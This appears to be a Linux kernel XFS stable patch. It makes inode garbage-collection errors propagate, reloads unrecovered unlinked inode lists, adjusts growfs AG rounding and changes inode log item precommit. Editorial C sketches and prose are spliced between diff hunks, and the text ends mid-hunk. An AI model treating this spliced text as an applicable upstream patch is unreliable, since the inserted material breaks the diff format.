+-	if (nb_mod && nb_mod < XFS_MIN_AG_BLOCKS) {
+-		nagcount--;
+-		nb = (xfs_rfsblock_t)nagcount * mp->m_sb.sb_agblocks;
++	if (nb_mod && nb_mod >= XFS_MIN_AG_BLOCKS)
++		nb_div++;
++	else if (nb_mod)
++		nb = nb_div * mp->m_sb.sb_agblocks;
++
++	if (nb_div > XFS_MAX_AGNUMBER + 1) {
++		nb_div = XFS_MAX_AGNUMBER + 1;
++		nb = nb_div * mp->m_sb.sb_agblocks;
+ 	}
++	nagcount = nb_div;
+ 	delta = nb - mp->m_sb.sb_dblocks;
+ 	/*
+ 	 * Reject filesystems with a single AG because they are not
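/*
 * (Editorial sketch.) The grow-size rounding the fsops hunk implements,
 * pulled into an invented helper with plain parameters: a trailing runt
 * smaller than the minimum AG size is dropped, otherwise it becomes one
 * more AG, and the AG count is clamped to the format maximum.
 */
#include <linux/types.h>
#include <asm/div64.h>

static u64 demo_round_growfs_blocks(u64 nb, u32 agblocks, u32 min_ag_blocks,
				    u32 max_ags, u64 *nagcount)
{
	u64 div = nb;
	u32 mod = do_div(div, agblocks);	/* div = nb / agblocks */

	if (mod >= min_ag_blocks)
		div++;				/* runt is big enough: keep it */
	else if (mod)
		nb = div * agblocks;		/* drop the runt */

	if (div > max_ags) {			/* clamp to the format limit */
		div = max_ags;
		nb = div * agblocks;
	}
	*nagcount = div;
	return nb;
}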
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index dd5a664c294f56..6df826fc787c64 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -113,7 +113,7 @@ xfs_inode_alloc(
+ 	INIT_LIST_HEAD(&ip->i_ioend_list);
+ 	spin_lock_init(&ip->i_ioend_lock);
+ 	ip->i_next_unlinked = NULLAGINO;
+-	ip->i_prev_unlinked = NULLAGINO;
++	ip->i_prev_unlinked = 0;
+ 
+ 	return ip;
+ }
+@@ -454,6 +454,27 @@ xfs_inodegc_queue_all(
+ 	return ret;
+ }
+ 
++/* Wait for all queued work and collect errors */
++static int
++xfs_inodegc_wait_all(
++	struct xfs_mount	*mp)
++{
++	int			cpu;
++	int			error = 0;
++
++	flush_workqueue(mp->m_inodegc_wq);
++	for_each_online_cpu(cpu) {
++		struct xfs_inodegc	*gc;
++
++		gc = per_cpu_ptr(mp->m_inodegc, cpu);
++		if (gc->error && !error)
++			error = gc->error;
++		gc->error = 0;
++	}
++
++	return error;
++}
++
+ /*
+  * Check the validity of the inode we just found in the cache
+  */
+@@ -1490,15 +1511,14 @@ xfs_blockgc_free_space(
+ 	if (error)
+ 		return error;
+ 
+-	xfs_inodegc_flush(mp);
+-	return 0;
++	return xfs_inodegc_flush(mp);
+ }
+ 
+ /*
+  * Reclaim all the free space that we can by scheduling the background blockgc
+  * and inodegc workers immediately and waiting for them all to clear.
+  */
+-void
++int
+ xfs_blockgc_flush_all(
+ 	struct xfs_mount	*mp)
+ {
+@@ -1519,7 +1539,7 @@ xfs_blockgc_flush_all(
+ 	for_each_perag_tag(mp, agno, pag, XFS_ICI_BLOCKGC_TAG)
+ 		flush_delayed_work(&pag->pag_blockgc_work);
+ 
+-	xfs_inodegc_flush(mp);
++	return xfs_inodegc_flush(mp);
+ }
+ 
+ /*
+@@ -1841,13 +1861,17 @@ xfs_inodegc_set_reclaimable(
+  * This is the last chance to make changes to an otherwise unreferenced file
+  * before incore reclamation happens.
+  */
+-static void
++static int
+ xfs_inodegc_inactivate(
+ 	struct xfs_inode	*ip)
+ {
++	int			error;
++
+ 	trace_xfs_inode_inactivating(ip);
+-	xfs_inactive(ip);
++	error = xfs_inactive(ip);
+ 	xfs_inodegc_set_reclaimable(ip);
++	return error;
++
+ }
+ 
+ void
+@@ -1858,6 +1882,7 @@ xfs_inodegc_worker(
+ 						struct xfs_inodegc, work);
+ 	struct llist_node	*node = llist_del_all(&gc->list);
+ 	struct xfs_inode	*ip, *n;
++	unsigned int		nofs_flag;
+ 
+ 	ASSERT(gc->cpu == smp_processor_id());
+ 
+@@ -1866,14 +1891,27 @@ xfs_inodegc_worker(
+ 	if (!node)
+ 		return;
+ 
++	/*
++	 * We can allocate memory here while doing writeback on behalf of
++	 * memory reclaim.  To avoid memory allocation deadlocks set the
++	 * task-wide nofs context for the following operations.
++	 */
++	nofs_flag = memalloc_nofs_save();
++
+ 	ip = llist_entry(node, struct xfs_inode, i_gclist);
+ 	trace_xfs_inodegc_worker(ip->i_mount, READ_ONCE(gc->shrinker_hits));
+ 
+ 	WRITE_ONCE(gc->shrinker_hits, 0);
+ 	llist_for_each_entry_safe(ip, n, node, i_gclist) {
++		int	error;
++
+ 		xfs_iflags_set(ip, XFS_INACTIVATING);
+-		xfs_inodegc_inactivate(ip);
++		error = xfs_inodegc_inactivate(ip);
++		if (error && !gc->error)
++			gc->error = error;
+ 	}
++
++	memalloc_nofs_restore(nofs_flag);
+ }
+ 
+ /*
+@@ -1894,13 +1932,13 @@ xfs_inodegc_push(
+  * Force all currently queued inode inactivation work to run immediately and
+  * wait for the work to finish.
+  */
+-void
++int
+ xfs_inodegc_flush(
+ 	struct xfs_mount	*mp)
+ {
+ 	xfs_inodegc_push(mp);
+ 	trace_xfs_inodegc_flush(mp, __return_address);
+-	flush_workqueue(mp->m_inodegc_wq);
++	return xfs_inodegc_wait_all(mp);
+ }
+ 
+ /*
+diff --git a/fs/xfs/xfs_icache.h b/fs/xfs/xfs_icache.h
+index 6cd180721659b2..da58984b80d2a0 100644
+--- a/fs/xfs/xfs_icache.h
++++ b/fs/xfs/xfs_icache.h
+@@ -59,7 +59,7 @@ int xfs_blockgc_free_dquots(struct xfs_mount *mp, struct xfs_dquot *udqp,
+ 		unsigned int iwalk_flags);
+ int xfs_blockgc_free_quota(struct xfs_inode *ip, unsigned int iwalk_flags);
+ int xfs_blockgc_free_space(struct xfs_mount *mp, struct xfs_icwalk *icm);
+-void xfs_blockgc_flush_all(struct xfs_mount *mp);
++int xfs_blockgc_flush_all(struct xfs_mount *mp);
+ 
+ void xfs_inode_set_eofblocks_tag(struct xfs_inode *ip);
+ void xfs_inode_clear_eofblocks_tag(struct xfs_inode *ip);
+@@ -77,7 +77,7 @@ void xfs_blockgc_start(struct xfs_mount *mp);
+ 
+ void xfs_inodegc_worker(struct work_struct *work);
+ void xfs_inodegc_push(struct xfs_mount *mp);
+-void xfs_inodegc_flush(struct xfs_mount *mp);
++int xfs_inodegc_flush(struct xfs_mount *mp);
+ void xfs_inodegc_stop(struct xfs_mount *mp);
+ void xfs_inodegc_start(struct xfs_mount *mp);
+ void xfs_inodegc_cpu_dead(struct xfs_mount *mp, unsigned int cpu);
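/*
 * (Editorial sketch.) The icache hunks make inodegc collect per-cpu
 * errors. A compact version of the gather loop with generic types: flush
 * the workqueue first so every worker has stored its result, then report
 * the first error seen and clear the slots.
 */
#include <linux/workqueue.h>
#include <linux/percpu.h>
#include <linux/cpumask.h>

static int demo_gather_percpu_errors(struct workqueue_struct *wq,
				     int __percpu *errs)
{
	int cpu, error = 0;

	flush_workqueue(wq);
	for_each_online_cpu(cpu) {
		int *e = per_cpu_ptr(errs, cpu);

		if (*e && !error)
			error = *e;	/* keep the first error seen */
		*e = 0;
	}
	return error;
}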
+diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c
+index 54b707787f9070..9090852692274f 100644
+--- a/fs/xfs/xfs_inode.c
++++ b/fs/xfs/xfs_inode.c
+@@ -1620,16 +1620,7 @@ xfs_inactive_ifree(
+ 	 */
+ 	xfs_trans_mod_dquot_byino(tp, ip, XFS_TRANS_DQ_ICOUNT, -1);
+ 
+-	/*
+-	 * Just ignore errors at this point.  There is nothing we can do except
+-	 * to try to keep going. Make sure it's not a silent error.
+-	 */
+-	error = xfs_trans_commit(tp);
+-	if (error)
+-		xfs_notice(mp, "%s: xfs_trans_commit returned error %d",
+-			__func__, error);
+-
+-	return 0;
++	return xfs_trans_commit(tp);
+ }
+ 
+ /*
+@@ -1696,12 +1687,12 @@ xfs_inode_needs_inactive(
+  * now be truncated.  Also, we clear all of the read-ahead state
+  * kept for the inode here since the file is now closed.
+  */
+-void
++int
+ xfs_inactive(
+ 	xfs_inode_t	*ip)
+ {
+ 	struct xfs_mount	*mp;
+-	int			error;
++	int			error = 0;
+ 	int			truncate = 0;
+ 
+ 	/*
+@@ -1742,7 +1733,7 @@ xfs_inactive(
+ 		 * reference to the inode at this point anyways.
+ 		 */
+ 		if (xfs_can_free_eofblocks(ip, true))
+-			xfs_free_eofblocks(ip);
++			error = xfs_free_eofblocks(ip);
+ 
+ 		goto out;
+ 	}
+@@ -1752,9 +1743,21 @@ xfs_inactive(
+ 	     ip->i_df.if_nextents > 0 || ip->i_delayed_blks > 0))
+ 		truncate = 1;
+ 
+-	error = xfs_qm_dqattach(ip);
+-	if (error)
+-		goto out;
++	if (xfs_iflags_test(ip, XFS_IQUOTAUNCHECKED)) {
++		/*
++		 * If this inode is being inactivated during a quotacheck and
++		 * has not yet been scanned by quotacheck, we /must/ remove
++		 * the dquots from the inode before inactivation changes the
++		 * block and inode counts.  Most probably this is a result of
++		 * reloading the incore iunlinked list to purge unrecovered
++		 * unlinked inodes.
++		 */
++		xfs_qm_dqdetach(ip);
++	} else {
++		error = xfs_qm_dqattach(ip);
++		if (error)
++			goto out;
++	}
+ 
+ 	if (S_ISLNK(VFS_I(ip)->i_mode))
+ 		error = xfs_inactive_symlink(ip);
+@@ -1779,7 +1782,7 @@ xfs_inactive(
+ 	/*
+ 	 * Free the inode.
+ 	 */
+-	xfs_inactive_ifree(ip);
++	error = xfs_inactive_ifree(ip);
+ 
+ out:
+ 	/*
+@@ -1787,6 +1790,7 @@ xfs_inactive(
+ 	 * the attached dquots.
+ 	 */
+ 	xfs_qm_dqdetach(ip);
++	return error;
+ }
+ 
+ /*
+@@ -1837,12 +1841,17 @@ xfs_iunlink_lookup(
+ 
+ 	rcu_read_lock();
+ 	ip = radix_tree_lookup(&pag->pag_ici_root, agino);
++	if (!ip) {
++		/* Caller can handle inode not being in memory. */
++		rcu_read_unlock();
++		return NULL;
++	}
+ 
+ 	/*
+-	 * Inode not in memory or in RCU freeing limbo should not happen.
+-	 * Warn about this and let the caller handle the failure.
++	 * Inode in RCU freeing limbo should not happen.  Warn about this and
++	 * let the caller handle the failure.
+ 	 */
+-	if (WARN_ON_ONCE(!ip || !ip->i_ino)) {
++	if (WARN_ON_ONCE(!ip->i_ino)) {
+ 		rcu_read_unlock();
+ 		return NULL;
+ 	}
+@@ -1851,7 +1860,10 @@ xfs_iunlink_lookup(
+ 	return ip;
+ }
+ 
+-/* Update the prev pointer of the next agino. */
++/*
++ * Update the prev pointer of the next agino.  Returns -ENOLINK if the inode
++ * is not in cache.
++ */
+ static int
+ xfs_iunlink_update_backref(
+ 	struct xfs_perag	*pag,
+@@ -1866,7 +1878,8 @@ xfs_iunlink_update_backref(
+ 
+ 	ip = xfs_iunlink_lookup(pag, next_agino);
+ 	if (!ip)
+-		return -EFSCORRUPTED;
++		return -ENOLINK;
++
+ 	ip->i_prev_unlinked = prev_agino;
+ 	return 0;
+ }
+@@ -1910,6 +1923,64 @@ xfs_iunlink_update_bucket(
+ 	return 0;
+ }
+ 
++/*
++ * Load the inode @next_agino into the cache and set its prev_unlinked pointer
++ * to @prev_agino.  Caller must hold the AGI to synchronize with other changes
++ * to the unlinked list.
++ */
++STATIC int
++xfs_iunlink_reload_next(
++	struct xfs_trans	*tp,
++	struct xfs_buf		*agibp,
++	xfs_agino_t		prev_agino,
++	xfs_agino_t		next_agino)
++{
++	struct xfs_perag	*pag = agibp->b_pag;
++	struct xfs_mount	*mp = pag->pag_mount;
++	struct xfs_inode	*next_ip = NULL;
++	xfs_ino_t		ino;
++	int			error;
++
++	ASSERT(next_agino != NULLAGINO);
++
++#ifdef DEBUG
++	rcu_read_lock();
++	next_ip = radix_tree_lookup(&pag->pag_ici_root, next_agino);
++	ASSERT(next_ip == NULL);
++	rcu_read_unlock();
++#endif
++
++	xfs_info_ratelimited(mp,
++ "Found unrecovered unlinked inode 0x%x in AG 0x%x.  Initiating recovery.",
++			next_agino, pag->pag_agno);
++
++	/*
++	 * Use an untrusted lookup just to be cautious in case the AGI has been
++	 * corrupted and now points at a free inode.  That shouldn't happen,
++	 * but we'd rather shut down now since we're already running in a weird
++	 * situation.
++	 */
++	ino = XFS_AGINO_TO_INO(mp, pag->pag_agno, next_agino);
++	error = xfs_iget(mp, tp, ino, XFS_IGET_UNTRUSTED, 0, &next_ip);
++	if (error)
++		return error;
++
++	/* If this is not an unlinked inode, something is very wrong. */
++	if (VFS_I(next_ip)->i_nlink != 0) {
++		error = -EFSCORRUPTED;
++		goto rele;
++	}
++
++	next_ip->i_prev_unlinked = prev_agino;
++	trace_xfs_iunlink_reload_next(next_ip);
++rele:
++	ASSERT(!(VFS_I(next_ip)->i_state & I_DONTCACHE));
++	if (xfs_is_quotacheck_running(mp) && next_ip)
++		xfs_iflags_set(next_ip, XFS_IQUOTAUNCHECKED);
++	xfs_irele(next_ip);
++	return error;
++}
++
+ static int
+ xfs_iunlink_insert_inode(
+ 	struct xfs_trans	*tp,
+@@ -1941,6 +2012,8 @@ xfs_iunlink_insert_inode(
+ 	 * inode.
+ 	 */
+ 	error = xfs_iunlink_update_backref(pag, agino, next_agino);
++	if (error == -ENOLINK)
++		error = xfs_iunlink_reload_next(tp, agibp, agino, next_agino);
+ 	if (error)
+ 		return error;
+ 
+@@ -1956,6 +2029,7 @@ xfs_iunlink_insert_inode(
+ 	}
+ 
+ 	/* Point the head of the list to point to this inode. */
++	ip->i_prev_unlinked = NULLAGINO;
+ 	return xfs_iunlink_update_bucket(tp, pag, agibp, bucket_index, agino);
+ }
+ 
+@@ -2035,6 +2109,9 @@ xfs_iunlink_remove_inode(
+ 	 */
+ 	error = xfs_iunlink_update_backref(pag, ip->i_prev_unlinked,
+ 			ip->i_next_unlinked);
++	if (error == -ENOLINK)
++		error = xfs_iunlink_reload_next(tp, agibp, ip->i_prev_unlinked,
++				ip->i_next_unlinked);
+ 	if (error)
+ 		return error;
+ 
+@@ -2055,7 +2132,7 @@ xfs_iunlink_remove_inode(
+ 	}
+ 
+ 	ip->i_next_unlinked = NULLAGINO;
+-	ip->i_prev_unlinked = NULLAGINO;
++	ip->i_prev_unlinked = 0;
+ 	return error;
+ }
+ 
+@@ -2235,11 +2312,26 @@ xfs_ifree_cluster(
+ 		 * This buffer may not have been correctly initialised as we
+ 		 * didn't read it from disk. That's not important because we are
+ 		 * only using to mark the buffer as stale in the log, and to
+-		 * attach stale cached inodes on it. That means it will never be
+-		 * dispatched for IO. If it is, we want to know about it, and we
+-		 * want it to fail. We can acheive this by adding a write
+-		 * verifier to the buffer.
++		 * attach stale cached inodes on it.
++		 *
++		 * For the inode that triggered the cluster freeing, this
++		 * attachment may occur in xfs_inode_item_precommit() after we
++		 * have marked this buffer stale.  If this buffer was not in
++		 * memory before xfs_ifree_cluster() started, it will not be
++		 * marked XBF_DONE and this will cause problems later in
++		 * xfs_inode_item_precommit() when we trip over a (stale, !done)
++		 * buffer attached to the transaction.
++		 *
++		 * Hence we have to mark the buffer as XBF_DONE here. This is
++		 * safe because we are also marking the buffer as XBF_STALE and
++		 * XFS_BLI_STALE. That means it will never be dispatched for
++		 * IO and it won't be unlocked until the cluster freeing has
++		 * been committed to the journal and the buffer unpinned. If it
++		 * is written, we want to know about it, and we want it to
++		 * fail. We can achieve this by adding a write verifier to the
++		 * buffer.
+ 		 */
++		bp->b_flags |= XBF_DONE;
+ 		bp->b_ops = &xfs_inode_buf_ops;
+ 
+ 		/*
+@@ -3544,3 +3636,117 @@ xfs_iunlock2_io_mmap(
+ 	if (ip1 != ip2)
+ 		inode_unlock(VFS_I(ip1));
+ }
++
++/*
++ * Reload the incore inode list for this inode.  Caller should ensure that
++ * the link count cannot change, either by taking ILOCK_SHARED or otherwise
++ * preventing other threads from executing.
++ */
++int
++xfs_inode_reload_unlinked_bucket(
++	struct xfs_trans	*tp,
++	struct xfs_inode	*ip)
++{
++	struct xfs_mount	*mp = tp->t_mountp;
++	struct xfs_buf		*agibp;
++	struct xfs_agi		*agi;
++	struct xfs_perag	*pag;
++	xfs_agnumber_t		agno = XFS_INO_TO_AGNO(mp, ip->i_ino);
++	xfs_agino_t		agino = XFS_INO_TO_AGINO(mp, ip->i_ino);
++	xfs_agino_t		prev_agino, next_agino;
++	unsigned int		bucket;
++	bool			foundit = false;
++	int			error;
++
++	/* Grab the first inode in the list */
++	pag = xfs_perag_get(mp, agno);
++	error = xfs_ialloc_read_agi(pag, tp, &agibp);
++	xfs_perag_put(pag);
++	if (error)
++		return error;
++
++	/*
++	 * We've taken ILOCK_SHARED and the AGI buffer lock to stabilize the
++	 * incore unlinked list pointers for this inode.  Check once more to
++	 * see if we raced with anyone else to reload the unlinked list.
++	 */
++	if (!xfs_inode_unlinked_incomplete(ip)) {
++		foundit = true;
++		goto out_agibp;
++	}
++
++	bucket = agino % XFS_AGI_UNLINKED_BUCKETS;
++	agi = agibp->b_addr;
++
++	trace_xfs_inode_reload_unlinked_bucket(ip);
++
++	xfs_info_ratelimited(mp,
++ "Found unrecovered unlinked inode 0x%x in AG 0x%x.  Initiating list recovery.",
++			agino, agno);
++
++	prev_agino = NULLAGINO;
++	next_agino = be32_to_cpu(agi->agi_unlinked[bucket]);
++	while (next_agino != NULLAGINO) {
++		struct xfs_inode	*next_ip = NULL;
++
++		/* Found this caller's inode, set its backlink. */
++		if (next_agino == agino) {
++			next_ip = ip;
++			next_ip->i_prev_unlinked = prev_agino;
++			foundit = true;
++			goto next_inode;
++		}
++
++		/* Try in-memory lookup first. */
++		next_ip = xfs_iunlink_lookup(pag, next_agino);
++		if (next_ip)
++			goto next_inode;
++
++		/* Inode not in memory, try reloading it. */
++		error = xfs_iunlink_reload_next(tp, agibp, prev_agino,
++				next_agino);
++		if (error)
++			break;
++
++		/* Grab the reloaded inode. */
++		next_ip = xfs_iunlink_lookup(pag, next_agino);
++		if (!next_ip) {
++			/* No incore inode at all?  We reloaded it... */
++			ASSERT(next_ip != NULL);
++			error = -EFSCORRUPTED;
++			break;
++		}
++
++next_inode:
++		prev_agino = next_agino;
++		next_agino = next_ip->i_next_unlinked;
++	}
++
++out_agibp:
++	xfs_trans_brelse(tp, agibp);
++	/* Should have found this inode somewhere in the iunlinked bucket. */
++	if (!error && !foundit)
++		error = -EFSCORRUPTED;
++	return error;
++}
++
++/* Decide if this inode is missing its unlinked list and reload it. */
++int
++xfs_inode_reload_unlinked(
++	struct xfs_inode	*ip)
++{
++	struct xfs_trans	*tp;
++	int			error;
++
++	error = xfs_trans_alloc_empty(ip->i_mount, &tp);
++	if (error)
++		return error;
++
++	xfs_ilock(ip, XFS_ILOCK_SHARED);
++	if (xfs_inode_unlinked_incomplete(ip))
++		error = xfs_inode_reload_unlinked_bucket(tp, ip);
++	xfs_iunlock(ip, XFS_ILOCK_SHARED);
++	xfs_trans_cancel(tp);
++
++	return error;
++}
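
The bucket walk in xfs_inode_reload_unlinked_bucket() above rebuilds the
incore back-pointers for a singly linked on-disk list.  A rough userspace
model of that reconstruction, using a made-up table indexed by agino rather
than the real inode cache:

#include <stdio.h>

#define NULLAGINO	(~0U)
#define NINOS		8

/* next_unlinked[] stands in for i_next_unlinked; prev_unlinked[] is rebuilt. */
static unsigned int next_unlinked[NINOS];
static unsigned int prev_unlinked[NINOS];

static void reload_bucket(unsigned int head)
{
	unsigned int prev = NULLAGINO;	/* the head's backlink sentinel */
	unsigned int cur = head;

	while (cur != NULLAGINO) {
		prev_unlinked[cur] = prev;	/* set the backlink */
		prev = cur;
		cur = next_unlinked[cur];
	}
}

int main(void)
{
	/* bucket: 3 -> 5 -> 1 -> end */
	next_unlinked[3] = 5;
	next_unlinked[5] = 1;
	next_unlinked[1] = NULLAGINO;

	reload_bucket(3);
	printf("prev of 5 = %u, prev of 1 = %u\n",
	       prev_unlinked[5], prev_unlinked[1]);
	return 0;
}

The real function additionally pages uncached inodes in through
xfs_iunlink_reload_next() and fails with -EFSCORRUPTED if the caller's inode
never shows up in the bucket.
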
+diff --git a/fs/xfs/xfs_inode.h b/fs/xfs/xfs_inode.h
+index fa780f08dc8918..85395ad2859c08 100644
+--- a/fs/xfs/xfs_inode.h
++++ b/fs/xfs/xfs_inode.h
+@@ -68,8 +68,21 @@ typedef struct xfs_inode {
+ 	uint64_t		i_diflags2;	/* XFS_DIFLAG2_... */
+ 	struct timespec64	i_crtime;	/* time created */
+ 
+-	/* unlinked list pointers */
++	/*
++	 * Unlinked list pointers.  These point to the next and previous inodes
++	 * in the AGI unlinked bucket list, respectively.  These fields can
++	 * only be updated with the AGI locked.
++	 *
++	 * i_next_unlinked caches di_next_unlinked.
++	 */
+ 	xfs_agino_t		i_next_unlinked;
++
++	/*
++	 * If the inode is not on an unlinked list, this field is zero.  If the
++	 * inode is the first element in an unlinked list, this field is
++	 * NULLAGINO.  Otherwise, i_prev_unlinked points to the previous inode
++	 * in the unlinked list.
++	 */
+ 	xfs_agino_t		i_prev_unlinked;
+ 
+ 	/* VFS inode */
+@@ -81,6 +94,11 @@ typedef struct xfs_inode {
+ 	struct list_head	i_ioend_list;
+ } xfs_inode_t;
+ 
++static inline bool xfs_inode_on_unlinked_list(const struct xfs_inode *ip)
++{
++	return ip->i_prev_unlinked != 0;
++}
++
+ static inline bool xfs_inode_has_attr_fork(struct xfs_inode *ip)
+ {
+ 	return ip->i_forkoff > 0;
+@@ -326,6 +344,9 @@ static inline bool xfs_inode_has_large_extent_counts(struct xfs_inode *ip)
+  */
+ #define XFS_INACTIVATING	(1 << 13)
+ 
++/* Quotacheck is running but inode has not been added to quota counts. */
++#define XFS_IQUOTAUNCHECKED	(1 << 14)
++
+ /* All inode state flags related to inode reclaim. */
+ #define XFS_ALL_IRECLAIM_FLAGS	(XFS_IRECLAIMABLE | \
+ 				 XFS_IRECLAIM | \
+@@ -340,7 +361,7 @@ static inline bool xfs_inode_has_large_extent_counts(struct xfs_inode *ip)
+ #define XFS_IRECLAIM_RESET_FLAGS	\
+ 	(XFS_IRECLAIMABLE | XFS_IRECLAIM | \
+ 	 XFS_IDIRTY_RELEASE | XFS_ITRUNCATED | XFS_NEED_INACTIVE | \
+-	 XFS_INACTIVATING)
++	 XFS_INACTIVATING | XFS_IQUOTAUNCHECKED)
+ 
+ /*
+  * Flags for inode locking.
+@@ -470,7 +491,7 @@ enum layout_break_reason {
+ 	(xfs_has_grpid((pip)->i_mount) || (VFS_I(pip)->i_mode & S_ISGID))
+ 
+ int		xfs_release(struct xfs_inode *ip);
+-void		xfs_inactive(struct xfs_inode *ip);
++int		xfs_inactive(struct xfs_inode *ip);
+ int		xfs_lookup(struct xfs_inode *dp, const struct xfs_name *name,
+ 			   struct xfs_inode **ipp, struct xfs_name *ci_name);
+ int		xfs_create(struct user_namespace *mnt_userns,
+@@ -575,4 +596,13 @@ void xfs_end_io(struct work_struct *work);
+ int xfs_ilock2_io_mmap(struct xfs_inode *ip1, struct xfs_inode *ip2);
+ void xfs_iunlock2_io_mmap(struct xfs_inode *ip1, struct xfs_inode *ip2);
+ 
++static inline bool
++xfs_inode_unlinked_incomplete(
++	struct xfs_inode	*ip)
++{
++	return VFS_I(ip)->i_nlink == 0 && !xfs_inode_on_unlinked_list(ip);
++}
++int xfs_inode_reload_unlinked_bucket(struct xfs_trans *tp, struct xfs_inode *ip);
++int xfs_inode_reload_unlinked(struct xfs_inode *ip);
++
+ #endif	/* __XFS_INODE_H__ */
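
A minimal sketch of the i_prev_unlinked encoding documented above, with
hypothetical standalone types (0 means not listed, NULLAGINO marks the bucket
head, anything else is the previous inode's agino):

#include <assert.h>

typedef unsigned int agino_t;
#define NULLAGINO	((agino_t)~0U)

static int on_unlinked_list(agino_t prev_unlinked)
{
	return prev_unlinked != 0;	/* mirrors xfs_inode_on_unlinked_list() */
}

int main(void)
{
	assert(!on_unlinked_list(0));		/* not on any list */
	assert(on_unlinked_list(NULLAGINO));	/* first element of a bucket */
	assert(on_unlinked_list(42));		/* mid-list, prev agino is 42 */
	return 0;
}
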
+diff --git a/fs/xfs/xfs_inode_item.c b/fs/xfs/xfs_inode_item.c
+index ca2941ab6cbcdd..91c847a84e108c 100644
+--- a/fs/xfs/xfs_inode_item.c
++++ b/fs/xfs/xfs_inode_item.c
+@@ -29,6 +29,153 @@ static inline struct xfs_inode_log_item *INODE_ITEM(struct xfs_log_item *lip)
+ 	return container_of(lip, struct xfs_inode_log_item, ili_item);
+ }
+ 
++static uint64_t
++xfs_inode_item_sort(
++	struct xfs_log_item	*lip)
++{
++	return INODE_ITEM(lip)->ili_inode->i_ino;
++}
++
++/*
++ * Prior to finally logging the inode, we have to ensure that all the
++ * per-modification inode state changes are applied. This includes VFS inode
++ * state updates, format conversions, verifier state synchronisation and
++ * ensuring the inode buffer remains in memory whilst the inode is dirty.
++ *
++ * We have to be careful when we grab the inode cluster buffer due to lock
++ * ordering constraints. The unlinked inode modifications (xfs_iunlink_item)
++ * require AGI -> inode cluster buffer lock order. The inode cluster buffer is
++ * not locked until ->precommit, so it happens after everything else has been
++ * modified.
++ *
++ * Further, we have AGI -> AGF lock ordering, and with O_TMPFILE handling we
++ * have AGI -> AGF -> iunlink item -> inode cluster buffer lock order. Hence we
++ * cannot safely lock the inode cluster buffer in xfs_trans_log_inode() because
++ * it can be called on an inode (e.g. via bumplink/droplink) before we take the
++ * AGF lock modifying directory blocks.
++ *
++ * Rather than force a complete rework of all the transactions to call
++ * xfs_trans_log_inode() once and once only at the end of every transaction, we
++ * move the pinning of the inode cluster buffer to a ->precommit operation. This
++ * matches how the xfs_iunlink_item locks the inode cluster buffer, and it
++ * ensures that the inode cluster buffer locking is always done last in a
++ * transaction. i.e. we ensure the lock order is always AGI -> AGF -> inode
++ * cluster buffer.
++ *
++ * If we return the inode number as the precommit sort key then we'll also
++ * guarantee that the order of inode cluster buffer locking is the same for
++ * all the inodes and unlink items in the transaction.
++ */
++static int
++xfs_inode_item_precommit(
++	struct xfs_trans	*tp,
++	struct xfs_log_item	*lip)
++{
++	struct xfs_inode_log_item *iip = INODE_ITEM(lip);
++	struct xfs_inode	*ip = iip->ili_inode;
++	struct inode		*inode = VFS_I(ip);
++	unsigned int		flags = iip->ili_dirty_flags;
++
++	/*
++	 * Don't bother with i_lock for the I_DIRTY_TIME check here, as races
++	 * don't matter - we either will need an extra transaction in 24 hours
++	 * to log the timestamps, or will clear already cleared fields in the
++	 * worst case.
++	 */
++	if (inode->i_state & I_DIRTY_TIME) {
++		spin_lock(&inode->i_lock);
++		inode->i_state &= ~I_DIRTY_TIME;
++		spin_unlock(&inode->i_lock);
++	}
++
++	/*
++	 * If we're updating the inode core or the timestamps and it's possible
++	 * to upgrade this inode to bigtime format, do so now.
++	 */
++	if ((flags & (XFS_ILOG_CORE | XFS_ILOG_TIMESTAMP)) &&
++	    xfs_has_bigtime(ip->i_mount) &&
++	    !xfs_inode_has_bigtime(ip)) {
++		ip->i_diflags2 |= XFS_DIFLAG2_BIGTIME;
++		flags |= XFS_ILOG_CORE;
++	}
++
++	/*
++	 * Inode verifiers do not check that the extent size hint is an integer
++	 * multiple of the rt extent size on a directory with both rtinherit
++	 * and extszinherit flags set.  If we're logging a directory that is
++	 * misconfigured in this way, clear the hint.
++	 */
++	if ((ip->i_diflags & XFS_DIFLAG_RTINHERIT) &&
++	    (ip->i_diflags & XFS_DIFLAG_EXTSZINHERIT) &&
++	    (ip->i_extsize % ip->i_mount->m_sb.sb_rextsize) > 0) {
++		ip->i_diflags &= ~(XFS_DIFLAG_EXTSIZE |
++				   XFS_DIFLAG_EXTSZINHERIT);
++		ip->i_extsize = 0;
++		flags |= XFS_ILOG_CORE;
++	}
++
++	/*
++	 * Record the specific change for fdatasync optimisation. This allows
++	 * fdatasync to skip log forces for inodes that are only timestamp
++	 * dirty. Once we've processed the XFS_ILOG_IVERSION flag, convert it
++	 * to XFS_ILOG_CORE so that the actual on-disk dirty tracking
++	 * (ili_fields) correctly tracks that the version has changed.
++	 */
++	spin_lock(&iip->ili_lock);
++	iip->ili_fsync_fields |= (flags & ~XFS_ILOG_IVERSION);
++	if (flags & XFS_ILOG_IVERSION)
++		flags = ((flags & ~XFS_ILOG_IVERSION) | XFS_ILOG_CORE);
++
++	if (!iip->ili_item.li_buf) {
++		struct xfs_buf	*bp;
++		int		error;
++
++		/*
++		 * We hold the ILOCK here, so this inode is not going to be
++		 * flushed while we are here. Further, because there is no
++		 * buffer attached to the item, we know that there is no IO in
++		 * progress, so nothing will clear the ili_fields while we read
++		 * in the buffer. Hence we can safely drop the spin lock and
++		 * read the buffer knowing that the state will not change from
++		 * here.
++		 */
++		spin_unlock(&iip->ili_lock);
++		error = xfs_imap_to_bp(ip->i_mount, tp, &ip->i_imap, &bp);
++		if (error)
++			return error;
++
++		/*
++		 * We need an explicit buffer reference for the log item but
++		 * don't want the buffer to remain attached to the transaction.
++		 * Hold the buffer but release the transaction reference once
++		 * we've attached the inode log item to the buffer log item
++		 * list.
++		 */
++		xfs_buf_hold(bp);
++		spin_lock(&iip->ili_lock);
++		iip->ili_item.li_buf = bp;
++		bp->b_flags |= _XBF_INODES;
++		list_add_tail(&iip->ili_item.li_bio_list, &bp->b_li_list);
++		xfs_trans_brelse(tp, bp);
++	}
++
++	/*
++	 * Always OR in the bits from the ili_last_fields field.  This is to
++	 * coordinate with the xfs_iflush() and xfs_buf_inode_iodone() routines
++	 * in the eventual clearing of the ili_fields bits.  See the big comment
++	 * in xfs_iflush() for an explanation of this coordination mechanism.
++	 */
++	iip->ili_fields |= (flags | iip->ili_last_fields);
++	spin_unlock(&iip->ili_lock);
